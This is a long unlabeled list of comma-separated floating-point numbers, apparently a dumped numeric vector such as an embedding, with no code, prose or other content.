0.016378557309508324, -0.007497124373912811, 0.005733952391892672, -0.01163547858595848, -0.007376908324658871, 0.0008342281216755509, -0.013777513988316059, -0.00013103119272273034, -0.003970779944211245, 0.011606335639953613, -0.007376908324658871, 0.015781119465827942, 0.023635249584913254, 0.03730347752571106, 0.0008305851952172816, 0.022892093285918236, 0.022250941023230553, 0.009238438680768013, 0.011038039810955524, -0.012320347130298615, -0.02160978689789772, 0.002140213968232274, -0.011839482001960278, 0.0016666348092257977, 0.008247565478086472, 0.0023806465324014425, 0.008385996334254742, 0.02373725175857544, -0.012801212258636951, 0.009748447686433792, 0.0011711979750543833, -0.0064588929526507854, -0.004371501039713621, -0.013945088721811771, 0.007497124373912811, 0.00016541122749913484, -0.0024225402157753706, 0.0008365049725398421, -0.026520440354943275, 0.004054567310959101, 0.0032367322128266096, 0.006739397533237934, -0.030309073626995087, -0.007449766620993614, -0.00488879531621933, 0.019190890714526176, -0.019016029313206673, 0.006950686685740948, -0.020604342222213745, 0.0033660558983683586, 0.013879516161978245, -0.008458854630589485, -0.017413146793842316, 0.0002042310661636293, 0.005937955807894468, 0.007140118628740311, -0.0022349299397319555, -0.01044788770377636, -0.023358387872576714, 0.00227682339027524, -0.007238477002829313, -0.008225708268582821, 0.007034474052488804, 0.006233031861484051, -0.014688244089484215, 0.006637395825237036, -0.0037103116046637297, -0.009748447686433792, 0.014287522993981838, 0.006906971801072359, -0.005398803856223822, 0.01643684320151806, 0.002364253392443061, 0.013260220177471638, -0.005828667897731066, -0.0065281083807349205, 0.0048086512833833694, 0.008509855717420578, 0.001896138652227819, -0.0069106146693229675, 0.005730309523642063, 0.025733569636940956, 0.010149168781936169, 0.00950072892010212, 0.02468440867960453, -0.0147246727719903, -0.01971546933054924, -0.002806867938488722, -0.014010661281645298, 0.013158218003809452, -0.009806734509766102, -0.0036848110612481833, 0.007562696933746338, 0.004243998788297176, 0.0069324723444879055, 0.018083442002534866, -0.025369277223944664, -0.01519825216382742, -0.010855894535779953, 0.02128921076655388, -0.008145563304424286, -0.006950686685740948, -0.012793926522135735, -0.017733722925186157, -0.012844927608966827, -0.003369698766618967, -0.01358079630881548, -0.02061891369521618, -0.008371424861252308, 0.012043485417962074, 0.0012786641018465161, -0.031241660937666893, 0.012320347130298615, -0.0029034053441137075, -0.011897768825292587, -0.019584324210882187, -0.013945088721811771, -0.008728430606424809, 0.018243731930851936, -0.008932434022426605, 0.010440601967275143, 0.01054988894611597, -0.01821458712220192, -0.0031656953506171703, 0.005172942765057087, 0.01613083854317665, -0.013129075057804585, 0.014425953850150108, 0.0017221892485395074, -0.0013087181141600013, -0.0011147328186780214, -0.010018023662269115, -0.004528146702796221, -0.014025232754647732, 0.003850563894957304, -0.010455173440277576, 0.012109057977795601, -0.004411573056131601, -0.020210906863212585, -0.0026775444857776165, -0.006546322721987963, 0.011431475169956684, -0.011293044313788414, -0.0005482591222971678, -0.0045500039122998714, 0.010673748329281807, -0.016291126608848572, -0.005577306728810072, 0.010265741497278214, -0.00046310588368214667, 0.01133675966411829, -0.002052783966064453, 0.007671984378248453, -0.01325293444097042, 0.028881050646305084, -0.01696142368018627, 0.021245494484901428, -0.02042948268353939, 0.004648362752050161, -0.0059088123962283134, -0.011067183688282967, -0.019744614139199257, 0.003338733920827508, -0.027467599138617516, 0.0039999233558773994, -0.000026211930162389763, 0.004717578180134296, 0.007023544982075691, 0.04074238985776901, -0.017136285081505775, 0.021711789071559906, -0.03482629358768463, -0.008422425016760826, -0.009602731093764305, -0.0036957398988306522, -0.013566224835813046, 0.010775750502943993, 0.0007404229836538434, 0.030513077974319458, 0.019307462498545647, 0.016101695597171783, -0.01860802248120308, 0.0002632007817737758, 0.00007576130155939609, -0.013289363123476505, -0.029289057478308678, 0.01881202682852745, 0.0015846691094338894, 0.0005746702663600445, 0.011089040897786617, 0.022338369861245155, -0.012524350546300411, -0.017165428027510643, -0.03275711461901665, -0.016465988010168076, -0.008393282070755959, 0.00004055591853102669, -0.014491526409983635, 0.011482476256787777, -0.014491526409983635, 0.012553494423627853, -0.00692882901057601, -0.0017850296571850777, 0.00512558501213789, -0.00013285265595186502, -0.012276631779968739, -0.009646445512771606, -0.0061237444169819355, -0.02290666662156582, 0.013966945931315422, 0.002358789090067148, 0.014112662523984909, -0.01256078016012907, -0.0012249309802427888, -0.04077153280377388, -0.02207607962191105, 0.006258532404899597, -0.012903214432299137, 0.011511619202792645, 0.021478641778230667, -0.0062002455815672874, -0.017690008506178856, -0.0017649935325607657, -0.002475362503901124, 0.0055044484324753284, -0.004604647867381573, -0.0030090499203652143, 0.012138200923800468, 0.007591840345412493, 0.0019726399332284927, -0.009908735752105713, 0.010025309398770332, 0.0013706476893275976, -0.0020964990835636854, 0.012036199681460857, -0.00014412292512133718, 0.012021628208458424, 0.022571517154574394, 0.0005787685513496399, -0.028647903352975845, 0.008364139124751091, -0.0008433354087173939, -0.03707033023238182, 0.024990415200591087, 0.007446123752743006, 0.0010673748329281807, -0.018943171948194504, -0.023037809878587723, 0.000368162349332124, 0.006050886120647192, 0.018404019996523857, 0.016932280734181404, 0.0019434965215623379, -0.000024803146516205743, -0.0031092301942408085, 0.005686594173312187, -0.039926376193761826, -0.0051911575719714165, -0.020400337874889374, 0.028181610628962517, 0.007467980962246656, -0.009216581471264362, -0.009901450015604496, 0.00611281581223011, 0.010280312970280647, -0.015562543645501137, -0.003978066146373749, -0.01664084754884243, -0.008232994005084038, -0.009333155117928982, 0.014382238499820232, -0.022542374208569527, -0.025106988847255707, 0.021347496658563614, -0.004914295859634876, 0.0027522242162376642, 0.008910576812922955, -0.0038760642055422068, -0.003183909924700856, 0.010243884287774563, 0.02341667376458645, 0.01659713312983513, 0.02461155131459236, 0.015445970930159092, 0.0038724213372915983, 0.003890635911375284, -0.002386111067607999, -0.012509779073297977, -0.011300330050289631, -0.024349261075258255, 0.00009858645353233442, 0.03835263475775719, -0.004284071270376444, 0.007336835842579603, 0.008976149372756481, -0.0008820414077490568, -0.015839405357837677, 0.011344045400619507, -0.015766547992825508, 0.012990644201636314, 0.002074641641229391, -0.01814172975718975, 0.019176317378878593, 0.05580949783325195, -0.022921238094568253, -0.018520593643188477, -0.006542679853737354, 0.0093841552734375, -0.020414909347891808, -0.008575428277254105, -0.023372959345579147, -0.004240355920046568, -0.0008574516978114843, -0.018549736589193344, -0.00607274379581213, 0.006331390701234341, -0.011205614544451237, 0.013988803140819073, -0.0018414948135614395, -0.006462535820901394, -0.04508474841713905, -0.026593297719955444, -0.014710101298987865, 0.020021475851535797, 0.024902984499931335, 0.019336607307195663, -0.005715737584978342, 0.001925281947478652, 0.0005591878434643149, -0.022877521812915802, 0.017690008506178856, -0.008925148285925388, 0.006090958137065172, -0.0021857505198568106, 0.0027922962326556444, 0.0029216199181973934, 0.0140543757006526, 0.027351025491952896, -0.0048778667114675045, 0.0033642344642430544, -0.016786564141511917, 0.005555449519306421, 0.008903290145099163, -0.019817471504211426, -0.020138047635555267, -0.012691925279796124, -0.025821000337600708, -0.0021292853634804487, -0.017121711745858192, 0.0004626505251508206, 0.005384232383221388, -0.001532757538370788, 0.009209295734763145, -0.021158065646886826, -0.012575351633131504, -0.00004303196328692138, -0.02302323840558529, -0.002112892223522067, 0.012619066052138805, -0.006335033569484949, -0.011766623705625534, -0.0019890330731868744, 0.019584324210882187, -0.008305852301418781, -0.026433009654283524, -0.004579147323966026, -0.01127847284078598, -0.024771839380264282, -0.009981594048440456, 0.001415273523889482, 0.0014070769539102912, -0.009712018072605133, 0.01256078016012907, 0.0281087514013052, -0.010659176856279373, 0.002482648240402341, -0.03884807229042053, -0.02503412961959839, -0.0074825529009103775, 0.0052822306752204895, 0.005890597589313984, -0.00041506491834297776, -0.009376869536936283, 0.007722985465079546, -0.025500422343611717, -0.008385996334254742, 0.011919626034796238, -0.013078073970973492, 0.0021292853634804487, 0.02405782788991928, 0.007023544982075691, -0.0029835496097803116, 0.019424036145210266, 0.010360457934439182, -0.008670143783092499, -0.003449843032285571, 0.0006725736311636865, -0.04179155081510544, -0.0008970684721134603, 0.012910500168800354, -0.011234757490456104, -0.026170719414949417, 0.005912455264478922, -0.019934045150876045, 0.014659100212156773, 0.016101695597171783, 0.024815553799271584, 0.015037964098155499, 0.0014316666638478637, -0.007533553522080183, 0.00007160609675338492, -0.017398573458194733, 0.03162052482366562, 0.02570442669093609, -0.008109134621918201, 0.010702892206609249, 0.001679384964518249, 0.0058869547210633755, 0.0056647369638085365, -0.0022713590878993273, 0.027074163779616356, -0.008385996334254742, 0.010950610041618347, 0.00896886270493269, 0.0035919167567044497, 0.0039052076172083616, -0.012276631779968739, -0.004426144994795322, -0.003981709014624357, 0.013245648704469204, 0.02630186453461647, 0.010477030649781227, 0.00638967752456665, 0.00896886270493269, 0.002542756497859955, -0.017325716093182564, -0.013318507000803947, -0.00003583150828490034, 0.019351178780198097, 0.017806580290198326, 0.007110975217074156, -0.010732035152614117, -0.0033551270607858896, 0.0047102924436330795, -0.01999233104288578, 0.025995859876275063, -0.001856977236457169, -0.005107370670884848, 0.001356076099909842, 0.006702968385070562, 0.008043562062084675, -0.0025208990555256605, 0.01116189919412136, -0.02590842917561531, 0.01687399484217167, 0.01100161112844944, -0.003582809353247285, -0.0017513326602056623, -0.014185520820319653, -0.02542756497859955, -0.00022836538846604526, 0.0007795843412168324, 0.0003431173099670559, -0.016305699944496155, -0.016888566315174103, -0.0028706190641969442, 0.0006643771193921566, 0.01707799732685089, 0.012276631779968739, 0.004885152447968721, 0.017165428027510643, -0.015547972172498703, -0.009143723174929619, -0.02602500282227993, 0.0037740624975413084, -0.031125087291002274, 0.017486004158854485, 0.030454790219664574, -0.021201780065894127, -0.008225708268582821, -0.003271339926868677, -0.0023660750593990088, 0.021988650783896446, 0.011205614544451237, 0.015271110460162163, -0.022265512496232986, -0.001591954962350428, -0.011606335639953613, 0.0011038039810955524, -0.004134711343795061, -0.017675435170531273, 0.005686594173312187, -0.019467752426862717, 0.008575428277254105, 0.013850372284650803, -0.012706496752798557, -0.015489685349166393, -0.03663317859172821, -0.007839558646082878, -0.014338523149490356, -0.002074641641229391, -0.021857505664229393, -0.006845042109489441, -0.020997777581214905, -0.01236406248062849, -0.0025882930494844913, 0.008276708424091339, 0.013595368713140488, -0.010710177943110466, -0.007489838637411594, -0.007868701592087746, 0.020852060988545418, -0.011773909442126751, 0.004437073599547148, 0.0017048853915184736, 0.010433316230773926, 0.0007554500480182469, -0.0207792017608881, -0.016699133440852165, 0.019336607307195663, -0.01659713312983513, 0.004841437563300133, 0.024655265733599663, -0.020677199587225914, -0.007839558646082878, 0.012189202010631561, 0.023474961519241333, 0.008305852301418781, -0.006440678145736456, 0.014914104714989662, 0.015067107044160366, -0.038818929344415665, -0.007854130119085312, 0.014826674945652485, -0.018710024654865265, -0.02507784403860569, 0.007038116920739412, 0.009981594048440456, -0.008699286729097366, -0.008713859133422375, -0.007577268406748772, -0.013165503740310669, -0.02665158547461033, -0.007158332969993353, -0.014753816649317741, -0.018316589295864105, -0.022265512496232986, 0.02542756497859955, 0.002613793360069394, 0.029157912358641624, 0.0008273976272903383, -0.00565745122730732, 0.021085206419229507, 0.0208229161798954, 0.02981363795697689, -0.005274944473057985, 0.006579109001904726, 0.014338523149490356, -0.003426163922995329, -0.012043485417962074, -0.01480481680482626, -0.04324871674180031, 0.01601426489651203, 0.009945165365934372, 0.0107247494161129, -0.006447963882237673, -0.01632027141749859, 0.0077521284110844135, 0.005216658115386963, -0.011941484175622463, 0.012130915187299252, -0.01585397683084011, -0.014790245331823826, -0.0010254812659695745, 0.006491679232567549, 0.018899455666542053, 0.0016183661064133048, 0.013194647617638111, -0.005566378124058247, -0.01013459637761116, -0.02061891369521618, -0.0010254812659695745, 0.012327632866799831, 0.021988650783896446, -0.006076386664062738, -0.01881202682852745, -0.012123629450798035, -0.02993021160364151, 0.01133675966411829, 0.015402255579829216, 0.003038193332031369, -0.029478488489985466, -0.007868701592087746, -0.00045263252104632556, -0.005227586720138788, -0.010950610041618347, -0.01750057563185692, 0.015460542403161526, -0.017165428027510643, -0.012327632866799831, -0.0046192193403840065, 0.03715775907039642, 0.006903328932821751, 0.018899455666542053, 0.009610016830265522, 0.011431475169956684, 0.005220300983637571, 0.016101695597171783, 0.022804664447903633, -0.0100544523447752, -0.008917862549424171, -0.011045326478779316, -0.012757496908307076, -0.00265204394236207, -0.025923000648617744, 0.012043485417962074, 0.0009435156243853271, 0.017340287566184998, -0.015868548303842545, -0.01805429905653, 0.012203773483633995, 0.015285681933164597, 0.03584630787372589, -0.004950725007802248, 0.009493443183600903, -0.01900145784020424, -0.0002593302051536739, -0.0004981689853593707, -0.020327480509877205, -0.006280390080064535, -0.00488879531621933, -0.025048701092600822, 0.00007371215906459838, -0.01758800633251667, -0.025544138625264168, -0.011467904783785343, -0.021740932017564774, -0.01530025340616703, -0.016655419021844864, -0.0006215728353708982, -0.01161362137645483, 0.012611780315637589, 0.0016648133751004934, -0.0030272644944489002, -0.012189202010631561, -0.014520669355988503, -0.0005628307699225843, 0.020210906863212585, -0.028371041640639305, 0.005311373621225357, -0.020473197102546692, -0.01003259513527155, 0.003681168192997575, 0.011817624792456627, 0.003018157323822379, -0.010775750502943993, -0.02373725175857544, -0.0007836826262064278, 0.01754429191350937, 0.007180190645158291, 0.00977759063243866, -0.0057885958813130856, -0.008342280983924866, 0.0034516644664108753, 0.017282001674175262, -0.009449727833271027, -0.013821229338645935, 0.007708413526415825, -0.012633638456463814, -0.035117726773023605, -0.004648362752050161, -0.0053368741646409035, -0.009151008911430836, 0.0020983205176889896, 0.009959736838936806, -0.013180076144635677, -0.0010482495417818427, 0.03797377273440361, 0.012611780315637589, -0.0070089735090732574, 0.007883273996412754, -0.003103765659034252, 0.005325945559889078, -0.01837487705051899, -0.0017713686684146523, 0.021697217598557472, 0.021828362718224525, -0.029901066794991493, -0.00001820035686250776, -0.001050070975907147, -0.0026374722365289927, 0.011344045400619507, 0.017398573458194733, 0.017894010990858078, -0.007985275238752365, 0.0006989848334342241, 0.019977759569883347, 0.0060326713137328625, 0.005879668984562159, -0.013813943602144718, -0.021944936364889145, -0.016218269243836403, -0.0029707993380725384, -0.0025919359177351, -0.006258532404899597, 0.01358079630881548, 0.007518982049077749, 0.004346000496298075, 0.010338599793612957, -0.022921238094568253, -0.003799563040956855, -0.00573759526014328, 0.007220262661576271, -0.0011566263856366277, -0.014848532155156136, 0.0037485621869564056, 0.0019781042356044054, 0.03473886102437973, 0.009690160863101482, -0.005610093008726835, 0.01535854022949934, 0.0010345885530114174, -0.005653807893395424, -0.016276555135846138, 0.006367819849401712, -0.0038287064526230097, 0.014637243002653122, 0.011934198439121246, -0.0016857601003721356, -0.012123629450798035, 0.020648056641221046, 0.025544138625264168, 0.01959889568388462, -0.01003259513527155, 0.008109134621918201, 0.008028990589082241, 0.005493519827723503, -0.006207531318068504, -0.005468019284307957, -0.02177007496356964, -0.02381010912358761, -0.001227663247846067, -0.01726743020117283, 0.00437514390796423, -0.005865097511559725, -0.009573587216436863, 0.00955901574343443, 0.01802515611052513, 0.031008513644337654, 0.005621021613478661, -0.020604342222213745, -0.003014514222741127, -0.005278587341308594, 0.0032185176387429237, -0.0016711883945390582, 0.01809801533818245, 0.00794155988842249, 0.005325945559889078, 0.011577191762626171, -0.008283994160592556, 0.01564997434616089, 0.02179921790957451, 0.004681149031966925, -0.004302285611629486, -0.0058869547210633755, 0.017282001674175262, -0.004524503834545612, 0.028225325047969818, 0.02429097518324852, 0.006480750162154436, -0.004076424986124039, -0.021085206419229507, -0.0161745548248291, -0.005180228967219591, -0.009202009998261929, -0.004870580974966288, 0.00821842160075903, 0.0002440754760755226, 0.019424036145210266, -0.0064370352774858475, 0.01474652998149395, 0.0037066687364131212, -0.01636398583650589, -0.02468440867960453, 0.006098243873566389, 0.015431398525834084, -0.007373264990746975, 0.012451492249965668, -0.004185712430626154, 0.0012003413867205381, -0.007759414613246918, 0.030309073626995087, -0.00950072892010212, 0.014761102385818958, 0.012917785905301571, 0.011781195178627968, 0.006371462717652321, -0.021158065646886826, -0.023125240579247475, 0.010877751745283604, -0.009070864878594875, -0.026010431349277496, -0.027117878198623657, 0.013507938012480736, -0.026170719414949417, 0.0038469210267066956, -0.008458854630589485, 0.003941636998206377, 0.012298489920794964, 0.009114580228924751, 0.0214494988322258, 0.014644528739154339, 0.001619276823475957, -0.0053368741646409035, 0.021580643951892853, -0.008305852301418781, -0.0061018867418169975, 0.00021015081438235939, -0.010571747086942196, -0.009267582558095455, -0.03459314629435539, -0.019424036145210266, -0.010557174682617188, 0.008655572310090065, 0.016538845375180244, -0.002295037964358926, -0.00129596795886755, -0.02752588503062725, -0.00006540175672853366, 0.006881471257656813, 0.004881509579718113, -0.006185674108564854, -0.02038576640188694, -0.003908850718289614, -0.006174745503813028, 0.016101695597171783, 0.014571670442819595, -0.011956055648624897, -0.02401411347091198, 0.007151047233492136, -0.001631116378121078, 0.02061891369521618, -0.02341667376458645, 0.017252856865525246, 0.02204693667590618, -0.002149321371689439, -0.01802515611052513, -0.023868396878242493, 0.004615576472133398, 0.015941407531499863, 0.007446123752743006, 0.023474961519241333, -0.008487997576594353, 0.011424189433455467, 0.007074546068906784, 0.007664698641747236, -0.0124223493039608, 0.004779507871717215, 0.012072629295289516, -0.006375105585902929, -0.020487768575549126, -0.008407853543758392, -0.0032549467869102955, -0.0019416750874370337, -0.0030582293402403593, -0.01060817576944828, 0.014149092137813568, 0.006877828389406204, 0.010236598551273346, -0.020210906863212585, 0.003231267910450697, -0.012961500324308872, 0.0026684370823204517, -0.007475266698747873, 0.00991602148860693, 0.013420508243143559, -0.005242158193141222, -0.00985773466527462, -0.021158065646886826, 0.007176547776907682, 0.025092415511608124, -0.0043824296444654465, -0.006655610632151365, 0.02863333187997341, -0.012203773483633995, 0.007344122044742107, 0.020968632772564888, 0.0033259836491197348, 0.012400491163134575, 0.012961500324308872, -0.021245494484901428, -0.021041492000222206, -0.039139505475759506, 0.010426030494272709, 0.008917862549424171, -0.007019902113825083, -0.015722831711173058, -0.01821458712220192, -0.03159138187766075, 0.014848532155156136, -0.005074584390968084, -0.02255694568157196, -0.008845004253089428, -0.0034334498923271894, -0.008881432935595512, -0.02022547833621502, 0.007934274151921272, 0.005708451848477125, 0.02235294133424759, 0.02783188968896866, -0.040509242564439774, 0.0062111746519804, -0.002435290487483144, -0.00441521592438221, 0.016611704602837563, 0.0024535050615668297, 0.005959813017398119, -0.00773755693808198, 0.00985773466527462, 0.005981670692563057, -0.0033059476409107447, -0.005475305020809174, -0.002917977049946785, -0.0011566263856366277, -0.020283764228224754, 0.009573587216436863, -0.0005377857014536858, 0.016975995153188705, 0.011271187104284763, 0.017442289739847183, 0.007242120336741209, 0.007446123752743006, -0.014731958508491516, -0.00559916440397501, -0.01664084754884243, 0.003242196748033166, 0.012415062636137009, -0.011766623705625534, -0.03450571373105049, -0.002083748811855912, 0.02207607962191105, 0.010149168781936169, 0.01620369777083397, 0.020254621282219887, -0.015373112633824348, -0.021784646436572075, -0.019773757085204124, -0.019963188096880913, -0.0027558670844882727, -0.015445970930159092, 0.008641000837087631, -0.020837487652897835, 0.004316857550293207, 0.0004232614883221686, 0.006670182105153799, -0.006364176981151104, -0.014207378961145878, 0.022542374208569527, -0.004105567932128906, -0.006659253500401974, -0.007183833513408899, 0.026433009654283524, 0.00484872329980135, 0.002014533383771777, -0.012189202010631561, 0.040917251259088516, 0.0015200073830783367, -0.01186862587928772, -0.00018339813686907291, -0.034447427839040756, 0.008436997421085835, -0.019132602959871292, 0.019074317067861557, -0.015664545819163322, 0.005704808980226517, -0.007034474052488804, 0.016378557309508324, 0.002484469674527645, 0.00465200562030077, 0.028720762580633163, -0.011052612215280533, 0.020371194928884506, 0.031445663422346115, -0.010433316230773926, 0.013566224835813046, 0.027394739910960197, 0.008633715100586414, -0.0025208990555256605, 0.028691619634628296, 0.02165350131690502, 0.023052383214235306, -0.015067107044160366, 0.003604667028412223, 0.024276401847600937, 0.011154613457620144, 0.0027850104961544275, -0.004109210800379515, -0.0007112796301953495, 0.0150816785171628, 0.003744919318705797, 0.015445970930159092, 0.0005031779874116182, -0.02842932939529419, 0.007715699262917042, -0.006677467841655016, -0.011628192849457264, -0.0009562658378854394, -0.011628192849457264, 0.0056501650251448154, 0.013945088721811771, -0.002121999394148588, -0.0010427851229906082, 0.033573128283023834, 0.0024116113781929016, -0.01264092419296503, -0.005012654699385166, -0.00037089455872774124, -0.015285681933164597, 0.008684715256094933, 0.013879516161978245, 0.004772222135215998, 0.007890559732913971, 0.013318507000803947, -0.0018096192507073283, 0.01044788770377636, -0.004724863916635513, -0.001277753384783864, 0.0077739860862493515, -0.03170795366168022, -0.01181033905595541, -0.013777513988316059, 0.018404019996523857, -0.004448002204298973, -0.011132756248116493, -0.0006220281939022243, -0.0024698982015252113, 0.0034152353182435036, -0.0020108905155211687, -0.004764936398714781, -0.00883043184876442, 0.007209334056824446, -0.0022476802114397287, -0.012997929938137531, 0.01763172075152397, 0.026549583300948143, -0.014455096796154976, 0.012473349459469318, 0.009930592961609364, 0.012014342471957207, -0.009959736838936806, -0.02117263711988926, -0.0035390944685786963, 0.007934274151921272, -0.008881432935595512, 0.0043277861550450325, 0.006218460388481617, -0.02019633539021015, 0.0008046294096857309, 0.00540244672447443, 0.010695605538785458, -0.004845080431550741, -0.008743002079427242, -0.022688090801239014, 0.01553340069949627, 0.01159176416695118, 0.023081526160240173, 0.008837717585265636, 0.004185712430626154, -0.02547127939760685, 0.02034205198287964, 0.012721068225800991, 0.01640770025551319, -0.0003055497072637081, -0.0034425570629537106, 0.014447811059653759, -0.010739320889115334, -0.02070634439587593, 0.010258455760776997, -0.02716159261763096, 0.005384232383221388, 0.012050771154463291, 0.017209142446517944, -0.0010755714029073715, 0.013690084218978882, 0.01564997434616089, 0.02295038104057312, -0.01924917660653591, -0.016626276075839996, 0.012808497995138168, -0.030571363866329193, 0.011191043071448803, -0.0067248260602355, 0.0017021532403305173, -0.0002616070269141346, 0.0013078073970973492, -0.006247603800147772, 0.008568142540752888, -0.006644681561738253, 0.004149283282458782, -0.007249406073242426, 0.015183680690824986, 0.02244037203490734, 0.010848608799278736, -0.006557251792401075, 0.016742849722504616, 0.0010528031270951033, -0.009967022575438023, 0.01011273916810751, -0.014061661437153816, -0.009420584887266159, 0.016232840716838837, -0.003792277304455638, 0.010047166608273983, 0.012888642027974129, 0.003438914194703102, -0.0056647369638085365, 0.0074825529009103775, -0.007620983757078648, -0.002925262786448002, -0.0012786641018465161, 0.007504410110414028, -0.011089040897786617, -0.016567988321185112, 0.008517141453921795, -0.017617149278521538, 0.006968901492655277, 0.01668456196784973, 0.017325716093182564, 0.006633752956986427, 0.013515223748981953, 0.006968901492655277, 0.0014908639714121819, -0.001581026241183281, 0.012400491163134575, -0.0008433354087173939, -0.0010773928370326757, -0.001091053825803101, 0.008240279741585255, 0.005591878667473793, 0.02034205198287964, 0.00936229806393385, -0.016669990494847298, 0.0013087181141600013, 0.007963418029248714, -0.011103612370789051, 0.003034550230950117, 0.007846844382584095, 0.005078227259218693, 0.005653807893395424, -0.006768540944904089, -0.0008100937702693045, 0.03141652047634125, -0.0068195415660738945, -0.012196487747132778, -0.0053587318398058414, 0.0038141347467899323, 0.022644376382231712, 0.0062148175202310085, -0.009114580228924751, -0.01297607272863388, 0.02401411347091198, -0.0014872211031615734, -0.04598819091916084, 0.0005496251978911459, -0.0015181859489530325, 0.016669990494847298, -0.004859651904553175, 0.015387684106826782, -0.01636398583650589, 0.0012841284042224288, -0.012517064809799194, -0.0012130915420129895, 0.007063616998493671, 0.033019404858350754, -0.012130915187299252, 0.016859423369169235, 0.011409617960453033, -0.010702892206609249, -0.010229312814772129, 0.028735334053635597, 0.0013542546657845378, 0.010090881958603859, -0.012436920776963234, -0.009821305982768536, -0.009617302566766739, 0.002661151345819235, -0.004298642743378878, 0.02181379124522209, -0.0028323684819042683, -0.01086318027228117, 0.006509893573820591, -0.02764245867729187, -0.013158218003809452, 0.0034516644664108753, -0.0021766433492302895, 0.0033460198901593685, -0.03328169509768486, 0.012079915031790733, 0.014906818978488445, 0.014200092293322086, 0.015591687522828579, -0.001818726654164493, 0.002182107651606202, -0.0076282694935798645, -0.024742696434259415, 0.008823146112263203, 0.009398727677762508, 0.0031966601964086294, -0.0006621002685278654, -0.0077521284110844135, -0.006447963882237673, 0.0018551558023318648, -0.01114004198461771, -0.00601445697247982, 0.013231076300144196, -0.0015527936629951, 0.03465143218636513, -0.007824987173080444, -0.0033369124867022038, 0.012815783731639385, 0.026841016486287117, 0.0007413337007164955, 0.006440678145736456, -0.01114004198461771, 0.004433430731296539, 0.006615538150072098, -0.0067648980766534805, -0.01747143268585205, 0.0021347496658563614, -0.017515147104859352, -0.0010136418277397752, -0.0026666156481951475, -0.0012531636748462915, -0.0005468929884955287, 0.008160135708749294, 0.023751823231577873, -0.005562735255807638, 0.003519058460369706, -0.002307788236066699, -0.004269499331712723, 0.00593431293964386, 0.01460809912532568, -0.01865173876285553, -0.007635555230081081, -0.01116189919412136, 0.014265664853155613, -0.013828515075147152, 0.002298681065440178, -0.012597208842635155, -0.012932357378304005, 0.0069106146693229675, 0.005544520448893309, -0.02708873525261879, -0.0100544523447752, 0.018272874876856804, -0.015402255579829216, 0.02713244967162609, -0.004192998167127371, 0.01519825216382742, -0.018316589295864105, -0.008327709510922432, 0.018622593954205513, 0.04456016793847084, -0.006141959223896265, 0.036254316568374634, 0.012983358465135098, -0.010010737925767899, -0.021347496658563614, -0.010928752832114697, 0.015562543645501137, -0.009668303653597832, -0.031125087291002274, -0.016567988321185112, -0.0235041044652462, -0.0008815860492177308, 0.007267620414495468, 0.006903328932821751, -0.002621079096570611, 0.018826598301529884, -0.014163663610816002, 0.015227395109832287, 0.0002670713874977082, 0.0014280236791819334, 0.009231152944266796, 0.030513077974319458, -0.007089117541909218, 0.0016138125211000443, -0.0015801155241206288, -0.030192499980330467, -0.0024298259522765875, 0.04849451780319214, 0.01303435955196619, 0.005311373621225357, 0.00883043184876442, 0.008123706094920635, 0.012211060151457787, 0.0019234605133533478, -0.00924572441726923, 0.0015099893789738417, -0.007715699262917042, -0.0009999808389693499, 0.004892438184469938, -0.0060472432523965836, -0.019744614139199257, -0.014498812146484852, 0.00014469213783740997, 0.005300445016473532, -0.0036902755964547396, -0.015460542403161526, -0.024830125272274017, 0.011380474083125591, 0.0014990605413913727, -0.0014316666638478637, -0.013770228251814842, -0.0019234605133533478, 0.004998082760721445, 0.009967022575438023, -0.011599049903452396, 0.008458854630589485, -0.00019717290706466883, 0.029274486005306244, -0.01632027141749859, -0.020648056641221046, 0.006021742708981037, 0.013362221419811249, 0.004841437563300133, 0.011963341385126114, 0.01161362137645483, -0.014578956179320812, -0.0064370352774858475, -0.012589923106133938, 0.015489685349166393, -0.0005591878434643149, 0.012320347130298615, -0.008546284399926662, 0.010149168781936169, 0.005369660444557667, 0.025718998163938522, 0.013121789321303368, 0.015955979004502296, 0.016349414363503456, -0.0007381461909972131, 0.001394326682202518, 0.015271110460162163, -0.0010892323916777968, -0.012691925279796124, 0.011650050058960915, -0.010090881958603859, -0.02153692953288555, -0.024786410853266716, 0.001178483827970922, -0.0005496251978911459, -0.01927831955254078, -0.016349414363503456, -0.02893933653831482, -0.010950610041618347, 0.0073149786330759525, 0.009690160863101482, -0.006236674729734659, -0.0014180056750774384, -0.021245494484901428, -0.012079915031790733, -0.005981670692563057, -0.012823069468140602, -0.009041721001267433, -0.029551347717642784, 0.009755733422935009, -0.013180076144635677, 0.004637434147298336, 0.0027558670844882727, 0.004863294772803783, -0.008910576812922955, 0.020837487652897835, -0.005588235333561897, 0.01052803173661232, -0.012342204339802265, 0.0044516450725495815, -0.006524465512484312, -0.0093841552734375, 0.009136437438428402, 0.02429097518324852, 0.00403999537229538, -0.035904597491025925, -0.02507784403860569, 0.01640770025551319, 0.0009198366897180676, 0.015373112633824348, -0.007759414613246918, 0.008211135864257812, 0.015489685349166393, 0.01624741218984127, 0.02625815011560917, -0.03890635818243027, -0.004284071270376444, -0.0014863103860989213, -0.007457052357494831, 0.021697217598557472, -0.010185597464442253, -0.015067107044160366, 0.0009389619808644056, 0.0065827518701553345, -0.002779546193778515, -0.004524503834545612, 0.0012358598178252578, 0.009158294647932053, 0.00983587745577097, 0.002123821061104536, -0.0006238496280275285, 0.024771839380264282, 0.013558939099311829, -0.01025117002427578, -0.002160250209271908, 0.006036314647644758, -0.002347860485315323, 0.000289839634206146, -0.006702968385070562, -0.004065495915710926, 0.019613469019532204, 0.008699286729097366, 0.0014890425372868776, 0.005537234712392092, -0.0005159282009117305, 0.009595445357263088, 0.008786717429757118, 0.006768540944904089, 0.014207378961145878, -0.01750057563185692, 0.017165428027510643, 0.005872383248060942, 0.010899608954787254, 0.018943171948194504, 0.011642764322459698, -0.0037959201727062464, 0.010098167695105076, -0.021901220083236694, 0.004972582682967186, 0.004499003291130066, -0.013544367626309395, -0.0023788250982761383, -0.008998006582260132, 0.002160250209271908, 0.010404172353446484, 0.008611856959760189, -0.011249329894781113, -0.006225746124982834, 0.013682798482477665, 0.0241744015365839, 0.011263901367783546, -0.0005947062745690346, 0.0103677436709404, 0.007333192974328995, 0.0322616770863533, 0.014447811059653759, 0.011824910528957844, 0.00131600396707654, -0.001060999697074294, 0.007803129497915506, -0.007803129497915506, 0.014447811059653759, -0.0013515223981812596, -0.013347649946808815, -0.015096249990165234, -0.0016229198081418872, -0.007992560975253582, 0.024538692086935043, 0.0026647942140698433, 0.016844850033521652, -0.001198519836179912, 0.037828054279088974, 0.014287522993981838, 0.007722985465079546, 0.017529718577861786, -0.002551863668486476, 